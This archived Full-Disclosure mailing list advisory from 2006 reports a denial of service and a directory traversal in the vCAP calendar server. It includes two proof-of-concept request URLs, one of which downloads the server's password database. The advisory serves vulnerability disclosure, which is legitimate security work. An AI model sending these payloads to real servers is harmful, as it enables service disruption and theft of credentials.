[<prev] [next>] [day] [month] [year] [list]
Message-ID: <006301c6d5ca$c38b8a90$0100a8c0@koala2>
Date: Mon, 11 Sep 2006 17:50:22 -0000
From: <securma@...x.org>
To: <full-disclosure@...ts.grok.org.uk>
Subject: vCAP calendar server Multiple vulnerabilities
title: vCAP calendar server Multiple vulnerabilities
Author: securma massine <securma@...x.org>
MorX Security Research Team
http://www.morx.org
Product info : vCAP (www.pscs.co.uk)is a network calendar server for Windows. vCAP allows user to create calendars which can be viewed and modified by people on network using a web browser.
Original Advisory/PoC : http://www.morx.org/vcap.txt
Severity: Medium/High - user can remotely attack the server
Vulnerability Description:
v1: denial of service attack with a specific request
v2: directory traversal , any file on the system can be downloaded ,especially vCAp's passwords (vCAP.db)
Affected Software(s): vCAP calendar server 1.9.0 Beta and prior
Affected platform(s): Windows
Exploit/Proof of Concept:
v1- http://127.0.0.1:6100/StoresAndCalendarsList.cgi?session=%d%d%d%d%d
v2- http://127.0.0.1:6100/../Data/vCAP.db
Solution : ??
History:
16/08/2006 initial vendor contact
17/08/2006 sending vulnerability details
31/08/2006 vulnerability confirmed
Disclaimer:
this entire document is for eductional, testing and demonstrating purpose only.The author do not have any responsibility for any malicious use of this advisory or proof of concept code.
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists